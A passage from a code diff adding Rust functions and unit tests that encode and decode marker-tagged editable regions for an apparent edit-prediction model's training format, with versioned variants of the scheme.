+ let old_changed_start = span_common_prefix;
+ let old_changed_len = old_span_len
+ .saturating_sub(span_common_prefix)
+ .saturating_sub(span_common_suffix);
+ let new_changed_start = span_common_prefix;
+ let new_changed_len = new_span_len
+ .saturating_sub(span_common_prefix)
+ .saturating_sub(span_common_suffix);
+
+ if old_changed_len == 0 {
+ new_changed_start
+ } else {
+ new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len)
+ }
+ }
+}
+
+fn snap_to_line_start(text: &str, offset: usize) -> usize {
+ let bounded = offset.min(text.len());
+ let bounded = text.floor_char_boundary(bounded);
+
+ if bounded >= text.len() {
+ return text.len();
+ }
+
+ if bounded == 0 || text.as_bytes().get(bounded - 1) == Some(&b'\n') {
+ return bounded;
+ }
+
+ if let Some(next_nl_rel) = text[bounded..].find('\n') {
+ let next = bounded + next_nl_rel + 1;
+ return text.floor_char_boundary(next.min(text.len()));
+ }
+
+ let prev_start = text[..bounded].rfind('\n').map(|idx| idx + 1).unwrap_or(0);
+ text.floor_char_boundary(prev_start)
+}
+
+/// Write the editable region content with byte-exact marker tags, inserting the
+/// cursor marker at the given offset within the editable text.
+///
+/// The `tag_for_index` closure maps a boundary index to the marker tag string.
+fn write_editable_with_markers_impl(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+ marker_offsets: &[usize],
+ tag_for_index: impl Fn(usize) -> String,
+) {
+ let mut cursor_placed = false;
+ for (i, &offset) in marker_offsets.iter().enumerate() {
+ output.push_str(&tag_for_index(i));
+
+ if let Some(&next_offset) = marker_offsets.get(i + 1) {
+ let block = &editable_text[offset..next_offset];
+ if !cursor_placed
+ && cursor_offset_in_editable >= offset
+ && cursor_offset_in_editable <= next_offset
+ {
+ cursor_placed = true;
+ let cursor_in_block = cursor_offset_in_editable - offset;
+ output.push_str(&block[..cursor_in_block]);
+ output.push_str(cursor_marker);
+ output.push_str(&block[cursor_in_block..]);
+ } else {
+ output.push_str(block);
+ }
+ }
+ }
+}
+
+pub fn write_editable_with_markers_v0316(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag(i + 1),
+ );
+}
+
+pub fn write_editable_with_markers_v0317(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ let anchor_idx = cursor_block_index(Some(cursor_offset_in_editable), &marker_offsets);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag_relative(i as isize - anchor_idx as isize),
+ );
+}
+
+pub fn write_editable_with_markers_v0318(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets_v0318(editable_text);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag(i + 1),
+ );
+}
+
+/// Parse byte-exact model output and reconstruct the full new editable region.
+///
+/// `resolve_boundary` maps a parsed tag value to an absolute byte offset in
+/// old_editable, given the marker_offsets. Returns `(start_byte, end_byte)` or
+/// an error.
+fn apply_marker_span_impl(
+ old_editable: &str,
+ tags: &[ParsedTag],
+ output: &str,
+ resolve_boundaries: impl Fn(isize, isize) -> Result<(usize, usize)>,
+) -> Result<String> {
+ if tags.is_empty() {
+ return Err(anyhow!("no marker tags found in output"));
+ }
+ if tags.len() == 1 {
+ return Err(anyhow!(
+ "only one marker tag found in output, expected at least two"
+ ));
+ }
+
+ let start_value = tags[0].value;
+ let end_value = tags[tags.len() - 1].value;
+
+ if start_value == end_value {
+ return Ok(old_editable.to_string());
+ }
+
+ let (start_byte, end_byte) = resolve_boundaries(start_value, end_value)?;
+
+ if start_byte > end_byte {
+ return Err(anyhow!("start marker must come before end marker"));
+ }
+
+ let mut new_content = String::new();
+ for i in 0..tags.len() - 1 {
+ let content_start = tags[i].tag_end;
+ let content_end = tags[i + 1].tag_start;
+ if content_start <= content_end {
+ new_content.push_str(&output[content_start..content_end]);
+ }
+ }
+
+ let mut result = String::new();
+ result.push_str(&old_editable[..start_byte]);
+ result.push_str(&new_content);
+ result.push_str(&old_editable[end_byte..]);
+
+ Ok(result)
+}
+
+pub fn apply_marker_span_v0316(old_editable: &str, output: &str) -> Result<String> {
+ let tags = collect_marker_tags(output);
+
+ // Validate monotonically increasing with no gaps (best-effort warning)
+ if tags.len() >= 2 {
+ let start_num = tags[0].value;
+ let end_num = tags[tags.len() - 1].value;
+ if start_num != end_num {
+ let expected: Vec<isize> = (start_num..=end_num).collect();
+ let actual: Vec<isize> = tags.iter().map(|t| t.value).collect();
+ if actual != expected {
+ eprintln!(
+ "V0316 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.",
+ expected, actual
+ );
+ }
+ }
+ }
+
+ let marker_offsets = compute_marker_offsets(old_editable);
+ apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| {
+ let start_idx = (start_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = (end_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
+pub fn apply_marker_span_v0317(
+ old_editable: &str,
+ output: &str,
+ cursor_offset_in_old: Option<usize>,
+) -> Result<String> {
+ let tags = collect_relative_marker_tags(output);
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let anchor_idx = cursor_block_index(cursor_offset_in_old, &marker_offsets);
+
+ apply_marker_span_impl(old_editable, &tags, output, |start_delta, end_delta| {
+ let start_idx_signed = anchor_idx as isize + start_delta;
+ let end_idx_signed = anchor_idx as isize + end_delta;
+ if start_idx_signed < 0 || end_idx_signed < 0 {
+ return Err(anyhow!("relative marker maps before first marker"));
+ }
+ let start_idx = usize::try_from(start_idx_signed).context("invalid start marker index")?;
+ let end_idx = usize::try_from(end_idx_signed).context("invalid end marker index")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
+pub fn apply_marker_span_v0318(old_editable: &str, output: &str) -> Result<String> {
+ let tags = collect_marker_tags(output);
+
+ if tags.len() >= 2 {
+ let start_num = tags[0].value;
+ let end_num = tags[tags.len() - 1].value;
+ if start_num != end_num {
+ let expected: Vec<isize> = (start_num..=end_num).collect();
+ let actual: Vec<isize> = tags.iter().map(|t| t.value).collect();
+ if actual != expected {
+ eprintln!(
+ "V0318 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.",
+ expected, actual
+ );
+ }
+ }
+ }
+
+ let marker_offsets = compute_marker_offsets_v0318(old_editable);
+ apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| {
+ let start_idx = (start_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = (end_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
+/// Encode the training target from old and new editable text.
+///
+/// Shared implementation for V0316, V0317, and V0318. The `tag_for_block_idx`
+/// closure maps a block index to the appropriate marker tag string.
+/// `no_edit_tag` is the marker tag to repeat when there are no edits.
+fn encode_from_old_and_new_impl(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+ no_edit_tag: &str,
+ marker_offsets: &[usize],
+ tag_for_block_idx: impl Fn(usize) -> String,
+) -> Result<String> {
+ if old_editable == new_editable {
+ return Ok(format!("{no_edit_tag}{no_edit_tag}{end_marker}"));
+ }
+
+ let (common_prefix, common_suffix) =
+ common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes());
+ let change_end_in_old = old_editable.len() - common_suffix;
+
+ let mut start_marker_idx = marker_offsets
+ .iter()
+ .rposition(|&offset| offset <= common_prefix)
+ .unwrap_or(0);
+ let mut end_marker_idx = marker_offsets
+ .iter()
+ .position(|&offset| offset >= change_end_in_old)
+ .unwrap_or(marker_offsets.len() - 1);
+
+ if start_marker_idx == end_marker_idx {
+ if end_marker_idx < marker_offsets.len().saturating_sub(1) {
+ end_marker_idx += 1;
+ } else if start_marker_idx > 0 {
+ start_marker_idx -= 1;
+ }
+ }
+
+ let old_start = marker_offsets[start_marker_idx];
+ let old_end = marker_offsets[end_marker_idx];
+
+ let new_start = old_start;
+ let new_end = new_editable
+ .len()
+ .saturating_sub(old_editable.len().saturating_sub(old_end));
+
+ let new_span = &new_editable[new_start..new_end];
+ let old_span = &old_editable[old_start..old_end];
+
+ let (span_common_prefix, span_common_suffix) =
+ common_prefix_suffix(old_span.as_bytes(), new_span.as_bytes());
+
+ let mut result = String::new();
+ let mut prev_new_rel = 0usize;
+ let mut cursor_placed = false;
+
+ for block_idx in start_marker_idx..end_marker_idx {
+ result.push_str(&tag_for_block_idx(block_idx));
+
+ let new_rel_end = if block_idx + 1 == end_marker_idx {
+ new_span.len()
+ } else {
+ let old_rel = marker_offsets[block_idx + 1] - old_start;
+ let mapped = map_boundary_offset(
+ old_rel,
+ old_span.len(),
+ new_span.len(),
+ span_common_prefix,
+ span_common_suffix,
+ );
+ snap_to_line_start(new_span, mapped)
+ };
+
+ let new_rel_end = new_rel_end.max(prev_new_rel);
+ let block_content = &new_span[prev_new_rel..new_rel_end];
+
+ if !cursor_placed {
+ if let Some(cursor_offset) = cursor_offset_in_new {
+ let abs_start = new_start + prev_new_rel;
+ let abs_end = new_start + new_rel_end;
+ if cursor_offset >= abs_start && cursor_offset <= abs_end {
+ cursor_placed = true;
+ let cursor_in_block = cursor_offset - abs_start;
+ let bounded = cursor_in_block.min(block_content.len());
+ result.push_str(&block_content[..bounded]);
+ result.push_str(cursor_marker);
+ result.push_str(&block_content[bounded..]);
+ prev_new_rel = new_rel_end;
+ continue;
+ }
+ }
+ }
+
+ result.push_str(block_content);
+ prev_new_rel = new_rel_end;
+ }
+
+ result.push_str(&tag_for_block_idx(end_marker_idx));
+ result.push_str(end_marker);
+
+ Ok(result)
+}
+
+pub fn encode_from_old_and_new_v0316(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets));
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag(block_idx + 1),
+ )
+}
+
+pub fn encode_from_old_and_new_v0317(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let anchor_idx = cursor_block_index(cursor_offset_in_new, &marker_offsets);
+ let no_edit_tag = marker_tag_relative(0);
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag_relative(block_idx as isize - anchor_idx as isize),
+ )
+}
+
+pub fn encode_from_old_and_new_v0318(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets_v0318(old_editable);
+ let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets));
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag(block_idx + 1),
+ )
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn test_compute_marker_offsets_small_block() {
+ let text = "aaa\nbbb\nccc\n";
+ let offsets = compute_marker_offsets(text);
+ assert_eq!(offsets, vec![0, text.len()]);
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_blank_line_split() {
+ let text = "aaa\nbbb\nccc\n\nddd\neee\nfff\n";
+ let offsets = compute_marker_offsets(text);
+ assert_eq!(offsets[0], 0);
+ assert!(offsets.contains(&13), "offsets: {:?}", offsets);
+ assert_eq!(*offsets.last().unwrap(), text.len());
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_blank_line_split_overrides_pending_hard_cap_boundary() {
+ let text = "\
+class OCRDataframe(BaseModel):
+ model_config = ConfigDict(arbitrary_types_allowed=True)
+
+ df: pl.DataFrame
+
+ def page(self, page_number: int = 0) -> \"OCRDataframe\":
+ # Filter dataframe on specific page
+ df_page = self.df.filter(pl.col(\"page\") == page_number)
+ return OCRDataframe(df=df_page)
+
+ def get_text_cell(
+ self,
+ cell: Cell,
+ margin: int = 0,
+ page_number: Optional[int] = None,
+ min_confidence: int = 50,
+ ) -> Optional[str]:
+ \"\"\"
+ Get text corresponding to cell
+";
+ let offsets = compute_marker_offsets(text);
+
+ let def_start = text
+ .find(" def get_text_cell(")
+ .expect("def line exists");
+ let self_start = text.find(" self,").expect("self line exists");
+
+ assert!(
+ offsets.contains(&def_start),
+ "expected boundary at def line start ({def_start}), got {offsets:?}"
+ );
+ assert!(
+ !offsets.contains(&self_start),
+ "did not expect boundary at self line start ({self_start}), got {offsets:?}"
+ );
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_blank_line_split_skips_closer_line() {
+ let text = "\
+impl Plugin for AhoySchedulePlugin {
+ fn build(&self, app: &mut App) {
+ app.configure_sets(
+ self.schedule,
+ (
+ AhoySystems::MoveCharacters,
+ AhoySystems::ApplyForcesToDynamicRigidBodies,
+ )
+ .chain()
+ .before(PhysicsSystems::First),
+ );
+
+ }
+}
+
+/// System set used by all systems of `bevy_ahoy`.
+#[derive(SystemSet, Debug, Clone, Copy, Hash, PartialEq, Eq)]
+pub enum AhoySystems {
+ MoveCharacters,
+ ApplyForcesToDynamicRigidBodies,
+}
+";
+ let offsets = compute_marker_offsets(text);
+
+ let closer_start = text.find(" }\n").expect("closer line exists");
+ let doc_start = text
+ .find("/// System set used by all systems of `bevy_ahoy`.")
+ .expect("doc line exists");
+
+ assert!(
+ !offsets.contains(&closer_start),
+ "did not expect boundary at closer line start ({closer_start}), got {offsets:?}"
+ );
+ assert!(
+ offsets.contains(&doc_start),
+ "expected boundary at doc line start ({doc_start}), got {offsets:?}"
+ );
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_max_lines_split() {
+ let text = "1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n";
+ let offsets = compute_marker_offsets(text);
+ assert!(offsets.len() >= 3, "offsets: {:?}", offsets);
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_hard_cap_nudges_past_closer_to_case_line() {
+ let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\ncase 'x': {\nbody\n";
+ let offsets = compute_marker_offsets(text);
+
+ let expected = text.find("case 'x': {").expect("case line exists");
+ assert!(
+ offsets.contains(&expected),
+ "expected nudged boundary at case line start ({expected}), got {offsets:?}"
+ );
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_hard_cap_nudge_respects_max_forward_lines() {
+ let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\n}\n}\n}\n}\ncase 'x': {\nbody\n";
+ let offsets = compute_marker_offsets(text);
+
+ let case_start = text.find("case 'x': {").expect("case line exists");
+ assert!(
+ !offsets.contains(&case_start),
+ "boundary should not nudge beyond max forward lines; offsets: {offsets:?}"
+ );
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_stay_sorted_when_hard_cap_boundary_nudges_forward() {
+ let text = "\
+aaaaaaaaaa = 1;
+bbbbbbbbbb = 2;
+cccccccccc = 3;
+dddddddddd = 4;
+eeeeeeeeee = 5;
+ffffffffff = 6;
+gggggggggg = 7;
+hhhhhhhhhh = 8;
+ };
+ };
+
+ grafanaDashboards = {
+ cluster-overview.spec = {
+ inherit instanceSelector;
+ folderRef = \"infrastructure\";
+ json = builtins.readFile ./grafana/dashboards/cluster-overview.json;
+ };
+ };
+";
+ let offsets = compute_marker_offsets(text);
+
+ assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}");
+ assert_eq!(
+ offsets.last().copied(),
+ Some(text.len()),
+ "offsets: {offsets:?}"
+ );
+ assert!(
+ offsets.windows(2).all(|window| window[0] <= window[1]),
+ "offsets must be sorted: {offsets:?}"
+ );
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_empty() {
+ let offsets = compute_marker_offsets("");
+ assert_eq!(offsets, vec![0, 0]);
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_avoid_short_markdown_blocks() {
+ let text = "\
+# Spree Posts
+
+This is a Posts extension for [Spree Commerce](https://spreecommerce.org), built with Ruby on Rails.
+
+## Installation
+
+1. Add this extension to your Gemfile with this line:
+
+ ```ruby
+ bundle add spree_posts
+ ```
+
+2. Run the install generator
+
+ ```ruby
+ bundle exec rails g spree_posts:install
+ ```
+
+3. Restart your server
+
+ If your server was running, restart it so that it can find the assets properly.
+
+## Developing
+
+1. Create a dummy app
+
+ ```bash
+ bundle update
+ bundle exec rake test_app
+ ```
+
+2. Add your new code
+3. Run tests
+
+ ```bash
+ bundle exec rspec
+ ```
+
+When testing your applications integration with this extension you may use it's factories.
+Simply add this require statement to your spec_helper:
+
+```ruby
+require 'spree_posts/factories'
+```
+
+## Releasing a new version
+
+```shell
+bundle exec gem bump -p -t
+bundle exec gem release
+```
+
+For more options please see [gem-release README](https://github.com/svenfuchs/gem-release)
+
+## Contributing
+
+If you'd like to contribute, please take a look at the contributing guide.
+";
+ let offsets = compute_marker_offsets(text);
+
+ assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}");
+ assert_eq!(
+ offsets.last().copied(),
+ Some(text.len()),
+ "offsets: {offsets:?}"
+ );
+
+ for window in offsets.windows(2) {
+ let block = &text[window[0]..window[1]];
+ let line_count = block.lines().count();
+ assert!(
+ line_count >= V0316_MIN_BLOCK_LINES,
+ "block too short: {line_count} lines in block {block:?} with offsets {offsets:?}"
+ );
+ }
+ }
+
+ #[test]
+ fn test_extract_marker_span() {
+ let text = "<|marker_2|>\n new content\n<|marker_3|>\n";
+ let (start, end, content) = extract_marker_span(text).unwrap();
+ assert_eq!(start, 2);
+ assert_eq!(end, 3);
+ assert_eq!(content, " new content\n");
+ }
+
+ #[test]
+ fn test_extract_marker_span_multi_line() {
+ let text = "<|marker_1|>\nline1\nline2\nline3\n<|marker_4|>";
+ let (start, end, content) = extract_marker_span(text).unwrap();
+ assert_eq!(start, 1);
+ assert_eq!(end, 4);
+ assert_eq!(content, "line1\nline2\nline3\n");
+ }
+
+ #[test]
+ fn test_apply_marker_span_basic() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_1|>\naaa\nBBB\nccc\n<|marker_2|>";
+ let result = apply_marker_span(old, output).unwrap();
+ assert_eq!(result, "aaa\nBBB\nccc\n");
+ }
+
+ #[test]
+ fn test_apply_marker_span_preserves_trailing_blank_line() {
+ let old = "/\nresult\n\n";
+ let output = "<|marker_1|>\n//\nresult\n\n<|marker_2|>";
+ let result = apply_marker_span(old, output).unwrap();
+ assert_eq!(result, "//\nresult\n\n");
+ }
+
+ #[test]
+ fn test_encode_no_edits() {
+ let old = "aaa\nbbb\nccc\n";
+ let result = encode_from_old_and_new(
+ old,
+ old,
+ None,
+ "<|user_cursor|>",
+ ">>>>>>> UPDATED\n",
+ "NO_EDITS\n",
+ )
+ .unwrap();
+ assert_eq!(result, "NO_EDITS\n>>>>>>> UPDATED\n");
+ }
+
+ #[test]
+ fn test_encode_with_change() {
+ let old = "aaa\nbbb\nccc\n";
+ let new = "aaa\nBBB\nccc\n";
+ let result = encode_from_old_and_new(
+ old,
+ new,
+ None,
+ "<|user_cursor|>",
+ ">>>>>>> UPDATED\n",
+ "NO_EDITS\n",
+ )
+ .unwrap();
+ assert!(result.contains("<|marker_1|>"));
+ assert!(result.contains("<|marker_2|>"));
+ assert!(result.contains("aaa\nBBB\nccc\n"));
+ assert!(result.ends_with(">>>>>>> UPDATED\n"));
+ }
+
+ #[test]
+ fn test_roundtrip_encode_apply() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
+ let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
+ let encoded = encode_from_old_and_new(
+ old,
+ new,
+ None,
+ "<|user_cursor|>",
+ ">>>>>>> UPDATED\n",
+ "NO_EDITS\n",
+ )
+ .unwrap();
+ let output = encoded
+ .strip_suffix(">>>>>>> UPDATED\n")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span(old, output).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_extract_editable_region_from_markers_multi() {
+ let text = "prefix\n<|marker_1|>\naaa\nbbb\n<|marker_2|>\nccc\nddd\n<|marker_3|>\nsuffix";
+ let parsed = extract_editable_region_from_markers(text).unwrap();
+ assert_eq!(parsed, "aaa\nbbb\nccc\nddd");
+ }
+
+ #[test]
+ fn test_extract_editable_region_two_markers() {
+ let text = "<|marker_1|>\none\ntwo three\n<|marker_2|>";
+ let parsed = extract_editable_region_from_markers(text).unwrap();
+ assert_eq!(parsed, "one\ntwo three");
+ }
+
+ #[test]
+ fn test_encode_with_cursor() {
+ let old = "aaa\nbbb\nccc\n";
+ let new = "aaa\nBBB\nccc\n";
+ let result = encode_from_old_and_new(
+ old,
+ new,
+ Some(5),
+ "<|user_cursor|>",
+ ">>>>>>> UPDATED\n",
+ "NO_EDITS\n",
+ )
+ .unwrap();
+ assert!(result.contains("<|user_cursor|>"), "result: {result}");
+ assert!(result.contains("B<|user_cursor|>BB"), "result: {result}");
+ }
+
+ #[test]
+ fn test_extract_marker_span_strips_intermediate_markers() {
+ let text = "<|marker_2|>\nline1\n<|marker_3|>\nline2\n<|marker_4|>";
+ let (start, end, content) = extract_marker_span(text).unwrap();
+ assert_eq!(start, 2);
+ assert_eq!(end, 4);
+ assert_eq!(content, "line1\nline2\n");
+ }
+
+ #[test]
+ fn test_extract_marker_span_strips_multiple_intermediate_markers() {
+ let text = "<|marker_1|>\naaa\n<|marker_2|>\nbbb\n<|marker_3|>\nccc\n<|marker_4|>";
+ let (start, end, content) = extract_marker_span(text).unwrap();
+ assert_eq!(start, 1);
+ assert_eq!(end, 4);
+ assert_eq!(content, "aaa\nbbb\nccc\n");
+ }
+
+ #[test]
+ fn test_apply_marker_span_with_extra_intermediate_marker() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_1|>\naaa\n<|marker_1|>\nBBB\nccc\n<|marker_2|>";
+ let result = apply_marker_span(old, output).unwrap();
+ assert_eq!(result, "aaa\nBBB\nccc\n");
+ }
+
+ #[test]
+ fn test_strip_marker_tags_inline() {
+ assert_eq!(strip_marker_tags("no markers here"), "no markers here");
+ assert_eq!(strip_marker_tags("before<|marker_5|>after"), "beforeafter");
+ assert_eq!(
+ strip_marker_tags("line1\n<|marker_3|>\nline2"),
+ "line1\nline2"
+ );
+ }
+
+ #[test]
+ fn test_write_editable_with_markers_v0316_byte_exact() {
+ let editable = "aaa\nbbb\nccc\n";
+ let mut output = String::new();
+ write_editable_with_markers_v0316(&mut output, editable, 4, "<|user_cursor|>");
+ assert!(output.starts_with("<|marker_1|>"));
+ assert!(output.contains("<|user_cursor|>"));
+ let stripped = output.replace("<|user_cursor|>", "");
+ let stripped = strip_marker_tags(&stripped);
+ assert_eq!(stripped, editable);
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0316_basic() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_1|>aaa\nBBB\nccc\n<|marker_2|>";
+ let result = apply_marker_span_v0316(old, output).unwrap();
+ assert_eq!(result, "aaa\nBBB\nccc\n");
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0316_no_edit() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_1|><|marker_1|>";
+ let result = apply_marker_span_v0316(old, output).unwrap();
+ assert_eq!(result, old);
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0316_no_edit_any_marker() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_2|>ignored content<|marker_2|>";
+ let result = apply_marker_span_v0316(old, output).unwrap();
+ assert_eq!(result, old);
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0316_multi_block() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
+ let marker_offsets = compute_marker_offsets(old);
+ assert!(
+ marker_offsets.len() >= 3,
+ "expected at least 3 offsets, got {:?}",
+ marker_offsets
+ );
+
+ let new_content = "LINE1\nLINE2\nLINE3\n\nLINE5\nLINE6\nLINE7\nLINE8\n";
+ let mut output = String::new();
+ output.push_str("<|marker_1|>");
+ for i in 0..marker_offsets.len() - 1 {
+ if i > 0 {
+ output.push_str(&marker_tag(i + 1));
+ }
+ let start = marker_offsets[i];
+ let end = marker_offsets[i + 1];
+ let block_len = end - start;
+ output.push_str(&new_content[start..start + block_len]);
+ }
+ let last_marker_num = marker_offsets.len();
+ output.push_str(&marker_tag(last_marker_num));
+ let result = apply_marker_span_v0316(old, &output).unwrap();
+ assert_eq!(result, new_content);
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0316_byte_exact_no_normalization() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker_1|>aaa\nBBB\nccc<|marker_2|>";
+ let result = apply_marker_span_v0316(old, output).unwrap();
+ assert_eq!(result, "aaa\nBBB\nccc");
+ }
+
+ #[test]
+ fn test_encode_v0316_no_edits() {
+ let old = "aaa\nbbb\nccc\n";
+ let result =
+ encode_from_old_and_new_v0316(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
+ assert!(result.ends_with("<|end|>"));
+ let stripped = result.strip_suffix("<|end|>").unwrap();
+ let result_parsed = apply_marker_span_v0316(old, stripped).unwrap();
+ assert_eq!(result_parsed, old);
+ }
+
+ #[test]
+ fn test_encode_v0316_with_change() {
+ let old = "aaa\nbbb\nccc\n";
+ let new = "aaa\nBBB\nccc\n";
+ let result =
+ encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+ assert!(result.contains("<|marker_1|>"));
+ assert!(result.contains("<|marker_2|>"));
+ assert!(result.ends_with("<|end|>"));
+ }
+
+ #[test]
+ fn test_roundtrip_v0316() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
+ let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
+ let encoded =
+ encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span_v0316(old, stripped).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_roundtrip_v0316_with_cursor() {
+ let old = "aaa\nbbb\nccc\n";
+ let new = "aaa\nBBB\nccc\n";
+ let result =
+ encode_from_old_and_new_v0316(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
+ assert!(result.contains("<|user_cursor|>"), "result: {result}");
+ assert!(result.contains("B<|user_cursor|>BB"), "result: {result}");
+ }
+
+ #[test]
+ fn test_roundtrip_v0316_multi_block_change() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
+ let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n";
+ let encoded =
+ encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span_v0316(old, stripped).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_nearest_marker_number() {
+ let offsets = vec![0, 10, 20, 30];
+ assert_eq!(nearest_marker_number(Some(0), &offsets), 1);
+ assert_eq!(nearest_marker_number(Some(9), &offsets), 2);
+ assert_eq!(nearest_marker_number(Some(15), &offsets), 2);
+ assert_eq!(nearest_marker_number(Some(25), &offsets), 3);
+ assert_eq!(nearest_marker_number(Some(30), &offsets), 4);
+ assert_eq!(nearest_marker_number(None, &offsets), 1);
+ }
+
+ #[test]
+ fn test_marker_tag_relative_formats_as_expected() {
+ assert_eq!(marker_tag_relative(-2), "<|marker-2|>");
+ assert_eq!(marker_tag_relative(-1), "<|marker-1|>");
+ assert_eq!(marker_tag_relative(0), "<|marker-0|>");
+ assert_eq!(marker_tag_relative(1), "<|marker+1|>");
+ assert_eq!(marker_tag_relative(2), "<|marker+2|>");
+ }
+
+ #[test]
